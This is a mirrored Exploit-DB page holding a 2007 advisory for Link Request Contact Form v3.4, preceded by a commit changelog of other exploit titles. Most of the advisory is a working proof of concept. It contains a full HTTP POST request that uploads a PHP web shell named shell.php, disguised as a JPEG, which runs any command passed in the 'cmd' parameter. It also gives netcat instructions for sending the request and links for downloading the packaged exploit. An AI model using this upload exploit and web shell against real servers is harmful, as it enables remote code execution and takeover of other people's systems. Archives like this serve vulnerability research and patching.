bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/4059.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

111 lines
No EOL
4.1 KiB
Text
Raw Blame History

-=[--------------------ADVISORY-------------------]=-
Link Request Contact Form v3.4
Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-
-=[+] Application: Link Request Contact Form
-=[+] Version: 3.4
-=[+] Vendor's URL: http://www.americanfinancing.net/link-request-contact-form.cfm
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Remote code injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://corryl.altervista.org/
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck
..::[ Descriprion ]::..
Link Request Contact Form v3.4 is designed to let your friends or clients request to add their website link(s)
banner(s) to your website.
User can upload their banner(s) to a directory being a JPG or GIF file for your review before you post their listing(s).
Once the user fills in all the details an email will be sent to you with the file location and the users details.
The script will also email your client with a Confirmation email providing them with the same details.
You can modify the script to your liking and change the location of where the files will be store easily.
There are no restrictions and easy installation instructions are provided.
..::[ Bug ]::..
This software is affection from a bug type remote code injection,
a remote attacker is able' to injecting of the code inside the server victim,
to subsequently be performed.
This happens because' the script allows to insert an image jpg or bmp,
but not checking the data, and allowing of injecting of the code php.
..::[ Proof Of Concept ]::..
cut the exploit.txt edit the server-victim information,
using netcat to sending the exploit to server.
nc server-victim 80 < exploit.txt
open the browser and connection to http://server-victim/uploads/shell.php?cmd=uname -a
<---------cut here exploit.txt--------->
POST http://server-victim:80/output.php HTTP/1.1
Host: www.server-victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/prova/link-request-contact-form.html
Cookie: PHPSESSID=0654c063218badc1ad8b5a04edf9198d
Content-Type: multipart/form-data; boundary=---------------------------190291279311134
Content-length: 1115
-----------------------------190291279311134
Content-Disposition: form-data; name="Full_Name"
aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="email"
aa@aa.aa
-----------------------------190291279311134
Content-Disposition: form-data; name="Link_Back"
http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Title"
aa
-----------------------------190291279311134
Content-Disposition: form-data; name="You_Web_Address"
http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Description"
aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: image/jpeg
<?php ob_clean();echo"Remote command esecution by CorryL http://corryl.altervista.org";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
-----------------------------190291279311134
Content-Disposition: form-data; name="Submit"
Submit
-----------------------------190291279311134--
<----------------end cut---------------->
download the netcat+exploit from my server:
http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar)
# milw0rm.com [2007-06-11]
Reference in a new issue View git blame Copy permalink